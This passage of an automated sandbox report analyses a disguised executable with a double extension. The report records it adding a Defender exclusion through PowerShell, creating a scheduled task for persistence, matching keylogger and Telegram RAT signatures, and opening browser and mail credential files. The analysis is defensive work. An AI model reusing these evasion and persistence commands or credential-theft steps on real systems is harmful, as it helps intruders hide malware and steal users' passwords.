Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe" Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp" Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Users\user\AppData\Roaming\SOFcFE.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Users\user\AppData\Roaming\SOFcFE.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
